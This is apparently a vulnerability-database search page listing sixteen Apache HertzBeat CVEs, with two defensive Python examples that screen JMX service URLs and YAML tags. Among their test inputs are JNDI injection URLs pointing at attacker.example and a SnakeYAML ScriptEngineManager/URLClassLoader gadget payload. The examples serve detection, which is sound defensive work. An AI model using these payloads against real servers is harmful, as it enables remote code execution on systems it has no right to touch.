Lucene search: ApacheHertzbeat

16 matches found

CVE | added 2024/02/22 3:39 p.m. | 96 views

CVE-2023-51653

CVE-2023-51653 affects Hertzbeat real-time monitoring in JmxCollectImpl.java: the JMX service URL submitted to the /api/monitor/detect interface is handed to JMXConnectorFactory.connect, so an attacker-supplied URL turns the connection attempt into a JNDI injection. If a URL like service:jmx:rmi:///jndi/rmi://xxxxxx:1099/localHikar...

CVSS 9.8 | AI score 9.9 | EPSS 0.02131
Web
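The entry above describes the pattern: a JMX service URL chosen by the caller reaches JMXConnectorFactory.connect, and the /jndi/ part of that URL decides where the connector performs its JNDI lookup. The following is an added example, not HertzBeat's own code or the project's fix, of screening such a URL before it reaches the connector. It assumes the collector already knows the host the monitor is meant to target (the hypothetical expected_host parameter) and applies an allow-list policy chosen for this example: rmi connector only, a /jndi/ name that is an rmi:// registry entry on that same host, and no serialized /stub/ or /ior/ blobs.

```python
"""Screen a JMX service URL before it reaches JMXConnectorFactory.connect.

Added example, not HertzBeat's own code or fix. It assumes the collector
already knows the host the monitor is meant to target (expected_host) and
applies an allow-list policy chosen for this example:

  * only the rmi connector protocol;
  * the URL must carry a /jndi/ name (the RMI connector's normal way of
    locating the server), never a serialized /stub/ or /ior/ blob;
  * the JNDI name must be an rmi:// registry entry on the monitor's own
    target host, so the URL cannot redirect the lookup to an ldap:// or
    foreign rmi:// server of the attacker's choosing.
"""
import re
from dataclasses import dataclass, field
from typing import List

# JSR-160 grammar: service:jmx:<protocol>:<sap>, <sap> = //[host[:port]][url-path]
_SERVICE_RE = re.compile(
    r"^service:jmx:(?P<proto>[a-z0-9+\-]+)://(?P<host>[^/:]*)"
    r"(?::(?P<port>\d+))?(?P<path>/.*)?$",
    re.IGNORECASE,
)
# JNDI name carried after /jndi/ in an RMI connector URL: <scheme>://host[:port]/name
_JNDI_RE = re.compile(
    r"^(?P<scheme>[a-z]+)://(?P<host>[^/:]+)(?::(?P<port>\d+))?/(?P<name>[A-Za-z0-9_.\-]+)$",
    re.IGNORECASE,
)


@dataclass
class Verdict:
    allowed: bool
    reasons: List[str] = field(default_factory=list)


def screen_jmx_url(url: str, expected_host: str) -> Verdict:
    """Return Verdict(allowed=True) only if url satisfies every rule above."""
    m = _SERVICE_RE.match(url.strip())
    if not m:
        return Verdict(False, ["not a service:jmx:<protocol>://... URL"])
    reasons: List[str] = []
    proto = m.group("proto").lower()
    sap_host = m.group("host")
    path = m.group("path") or ""
    lpath = path.lower()

    if proto != "rmi":
        reasons.append(f"connector protocol {proto!r} not allowed (only rmi)")
    if sap_host and sap_host.lower() != expected_host.lower():
        reasons.append("service URL host differs from the monitor target")

    if lpath.startswith("/stub/") or lpath.startswith("/ior/"):
        # The connector decodes and deserializes the base64 blob in these paths.
        reasons.append("embedded serialized stub/IOR not allowed")
    elif lpath.startswith("/jndi/"):
        jm = _JNDI_RE.match(path[len("/jndi/"):])
        if not jm:
            reasons.append("malformed JNDI name after /jndi/")
        else:
            scheme = jm.group("scheme").lower()
            if scheme != "rmi":
                # ldap:// (and ldaps://) is the classic remote-codebase route.
                reasons.append(f"JNDI provider {scheme!r} not allowed (only rmi)")
            if jm.group("host").lower() != expected_host.lower():
                reasons.append("JNDI registry host differs from the monitor target")
    else:
        reasons.append("RMI connector URL must carry a /jndi/ name")

    return Verdict(not reasons, reasons)


if __name__ == "__main__":
    # Constructed sample inputs; 10.0.0.5 is the monitor's configured target.
    for candidate in (
        "service:jmx:rmi:///jndi/rmi://10.0.0.5:1099/jmxrmi",
        "service:jmx:rmi:///jndi/rmi://attacker.example:1099/Exploit",
        "service:jmx:rmi:///jndi/ldap://10.0.0.5:1389/x",
        "service:jmx:rmi://10.0.0.5:9999/stub/AAAA",
    ):
        print(candidate, screen_jmx_url(candidate, "10.0.0.5"))
```

The check pins the JNDI lookup to the monitor's own target and refuses LDAP providers, which closes the route the advisory describes (a URL pointing the lookup at a server the attacker runs). It does not protect against a target host whose RMI registry is itself hostile; for that case the JVM-side controls still matter, namely leaving com.sun.jndi.rmi.object.trustURLCodebase at its default of false and keeping gadget-bearing libraries off the collector's classpath.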
CVE | added 2024/08/20 8:56 p.m. | 85 views

CVE-2024-42362

CVE-2024-42362 affects Hertzbeat, an open-source real-time monitoring system. It describes an authenticated (user role) remote-code-execution vulnerability via unsafe deserialization in /api/monitors/import. The issue is classified with a high impact (CVSS v3.1: 8.8) affecting confidentiality, in...

CVSS 8.8 | AI score 8.6 | EPSS 0.0133
CVE | added 2024/08/20 8:56 p.m. | 81 views

CVE-2024-42361

CVE-2024-42361 affects Hertzbeat, versions 1.6.0 and earlier. The vulnerability stems from an endpoint under /api/monitor/{monitorId}/metric/{metricFull} that builds and executes a SQL query from user-controlled data without validating it. Reported impact includes potential SQL injection ...

CVSS 9.8 | AI score 7.9 | EPSS 0.0108
Web
CVE | added 2024/02/22 3:59 p.m. | 71 views

CVE-2023-51389

CVE-2023-51389 affects Hertzbeat, a real-time monitoring system. The vulnerability resides at the /define/yml interface, where SnakeYAML is used to parse YAML without a security configuration, enabling YAML deserialization. Affects versions prior to 1.4.1; version 1.4.1 fixes the issue. The issue...

CVSS 9.8 | AI score 9.6 | EPSS 0.01294
Web
CVE | added 2024/09/21 9:30 a.m. | 71 views

CVE-2024-42323

Apache HertzBeat (incubating) before version 1.6.0 is affected by a SnakeYAML deserialization vulnerability that enables remote code execution. The issue stems from insecure deserialization of YAML/XML data and is exploitable only by authorized (authenticated) attackers. Upgrade to 1.6.0 to fix the issue.

CVSS 8.8 | AI score 8.7 | EPSS 0.04054
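Both SnakeYAML entries above (CVE-2023-51389 and CVE-2024-42323) come down to the same mechanism: SnakeYAML's default Constructor maps any yaml.org tag it does not recognise, written !!some.Class, onto a Java class name and instantiates it, which is what the ScriptEngineManager/URLClassLoader gadget shape relies on. The following is an added example, not HertzBeat's own code or fix, of refusing such input on the raw text before any YAML parser sees it. Its allow-list (the YAML core schema) and the two sample definitions are assumptions constructed for this example.

```python
"""Refuse YAML that carries tags outside the core schema before it is parsed.

Added example, not HertzBeat's own code or fix. SnakeYAML's default
Constructor maps any unrecognised yaml.org tag (written !!some.Class) onto a
Java class name and instantiates it. The scanner below works on the raw text
with the standard library only, so it can sit in front of whatever parser
follows; its allow-list (an assumption of this example) is the core schema.
"""
import re
from typing import List, Tuple

ALLOWED_TAGS = frozenset({
    "!!str", "!!int", "!!float", "!!bool", "!!null", "!!map", "!!seq",
    "!!binary", "!!timestamp", "!!set", "!!omap", "!!pairs", "!!merge",
})

# A tag token starts with '!' at the start of a line or right after
# whitespace / flow punctuation, and runs until whitespace or punctuation.
_TAG_RE = re.compile(r"(?:^|(?<=[\s\[\{,:]))(![^\s\[\]\{\},]*)")


def _mask_quotes_and_comments(line: str) -> str:
    """Replace quoted scalars with spaces and drop the trailing comment.

    Positions are preserved so _TAG_RE's look-behind still sees the original
    token boundaries. A quote only opens a quoted scalar at a token start,
    so an apostrophe inside a plain scalar (don't) is left alone.
    """
    out: List[str] = []
    quote = None
    i = 0
    while i < len(line):
        c = line[i]
        if quote:
            if c == "\\" and quote == '"' and i + 1 < len(line):
                out.append("  ")          # escaped character in a double-quoted scalar
                i += 2
                continue
            if c == quote:
                quote = None
            out.append(" ")
        elif c in ("'", '"') and (i == 0 or line[i - 1] in " \t[{,"):
            quote = c
            out.append(" ")
        elif c == "#" and (i == 0 or line[i - 1].isspace()):
            break                         # comment runs to end of line
        else:
            out.append(c)
        i += 1
    return "".join(out)


def find_forbidden_tags(yaml_text: str) -> List[Tuple[int, str]]:
    """Return (line number, tag) for every tag that is not in ALLOWED_TAGS."""
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(yaml_text.splitlines(), 1):
        for m in _TAG_RE.finditer(_mask_quotes_and_comments(line)):
            tag = m.group(1)
            if tag not in ALLOWED_TAGS:
                hits.append((lineno, tag))
    return hits


def is_safe_to_parse(yaml_text: str) -> bool:
    return not find_forbidden_tags(yaml_text)


# Constructed samples: a benign monitor definition and one carrying the
# ScriptEngineManager/URLClassLoader gadget shape used against SnakeYAML.
BENIGN = """\
# constructed sample of a monitor definition
category: service
app: example_app
params:
  - field: host
    type: host
    required: true
  - field: port
    default: !!int 8080
    note: 'ends with a bang!'
"""

MALICIOUS = """\
category: service
app: !!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://attacker.example/"]
  ]]
]
"""

if __name__ == "__main__":
    print(find_forbidden_tags(BENIGN))
    print(find_forbidden_tags(MALICIOUS))
```

A pre-parse scan like this is a second line of defence, not a substitute for the parser-side fix: on the Java side the same effect is obtained by constructing the Yaml instance with SafeConstructor, which only ever builds core-schema types regardless of which tags appear in the document.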
CVE | added 2024/02/22 3:53 p.m. | 69 views

CVE-2023-51388

Hertzbeat real-time monitoring software is affected by CVE-2023-51388 due to direct execution of expressions in CalculateAlarm.java via AviatorEvaluator without a security policy, enabling AviatorScript injection. The issue is tied to Hertzbeat versions prior to 1.4.1; upgrading to version 1.4.1 ...

CVSS 9.8 | AI score 9.8 | EPSS 0.01309
CVE | added 2024/11/18 8:45 a.m. | 66 views

CVE-2024-45791

CVE-2024-45791 describes an information disclosure in Apache HertzBeat prior to version 1.6.1. The vulnerability exposes sensitive information to unauthorized actors and is addressed by upgrading to HertzBeat 1.6.1. The public documentation in multiple sources (NVD/NVD mirror, Red Hat advisory, C...

CVSS 7.5 | AI score 7.5 | EPSS 0.00791
CVE | added 2025/04/16 3:38 p.m. | 63 views

CVE-2024-56736

The CVE-2024-56736 entry describes a Server-Side Request Forgery (SSRF) vulnerability in Apache HertzBeat (incubating) affecting versions before 1.7.0. The flaw sits in the Api Config Oss component and allows the server to be made to issue requests it was never meant to make. Impact details i...

CVSS 6.5 | AI score 6.5 | EPSS 0.00532
CVE | added 2024/11/18 8:45 a.m. | 61 views

CVE-2024-41151

CVE-2024-41151: Apache HertzBeat (prior to 1.6.1) contains a deserialization of untrusted data vulnerability. The issue can be exploited by authorized users to achieve code execution, with a CVSS v3.1 base score of 8.8 (HIGH): network access, low privileges required, no user interaction. Th...

CVSS 8.8 | AI score 8.7 | EPSS 0.00955
CVE | added 2024/11/18 8:44 a.m. | 60 views

CVE-2024-45505

CVE-2024-45505 concerns Apache HertzBeat (incubating) prior to 1.6.1, where an improper neutralization of special elements enables a Command Injection. The vulnerability affects execution paths that process constructed commands, allowing an attacker with network access (and with low privileges) t...

CVSS 8.8 | AI score 8.8 | EPSS 0.02148
CVE | added 2023/12/22 3:06 p.m. | 49 views

CVE-2022-39337

CVE-2022-39337 affects Hertzbeat, a real-time monitoring system. The vulnerability is a permission bypass in versions up to 1.20, allowing bypass of system authentication and invocation of interfaces without authorization. The issue's root cause is implied to be improper access control in older r...

CVSS 7.5 | AI score 7.7 | EPSS 0.01111
CVE | added 2023/12/22 8:46 p.m. | 48 views

CVE-2023-51387

CVE-2023-51387 affects Hertzbeat before v1.4.1, where improper sanitization of alert expressions in the aviatorscript evaluation path allows a user with access to the alert define function to execute arbitrary commands on the Hertzbeat server. The root cause is improper input sanitization in alert express...

CVSS 8.8 | AI score 7.7 | EPSS 0.01461
CVE | added 2023/12/22 8:56 p.m. | 43 views

CVE-2023-51650

CVE-2023-51650 affects Hertzbeat prior to version 1.4.1, due to Spring Boot permission configuration issues that enable unauthorized access to three interfaces and may disclose sensitive server information. The issue is fixed in v1.4.1. No exploitation details are provided in the available docume...

CVSS 7.5 | AI score 7.7 | EPSS 0.00865
CVE | added 2025/09/09 9:30 a.m. | 27 views

CVE-2025-24404

Apache HertzBeat (incubating) before 1.7.0 is affected by an XML Injection RCE vulnerability: an authenticated attacker adds a monitor whose target returns a specially crafted XML sitemap response, which the monitor then parses. The issue can lead to remote code execution and impacts confidentiality...

CVSS 8.8 | AI score 6.5 | EPSS 0.00486
CVE | added 2026/02/10 9:28 a.m. | 20 views

CVE-2026-24343

CVE-2026-24343 affects Apache HertzBeat up to 1.7.9; fixed in 1.8.0. The flaw is an improper neutralization of data within XPath expressions, i.e., an XPath Injection that can cause uncontrolled resource consumption. Affected versions: 1.7.1 to 1.7.9. Impact metrics indicate high risk (Network attac...

CVSS 8.8 | AI score 5.5 | EPSS 0.00717
CVE | added 2025/09/09 9:31 a.m. | 18 views

CVE-2025-48208

CVE-2025-48208 describes an LDAP Injection vulnerability in Apache HertzBeat up to version 1.7.2. An attacker with an authenticated account can trigger the flaw by crafting custom LDAP queries, potentially resulting in arbitrary script execution. Remediation: upgrade to version 1.7.3 (fixes the i...

CVSS 8.8 | AI score 6.4 | EPSS 0.00589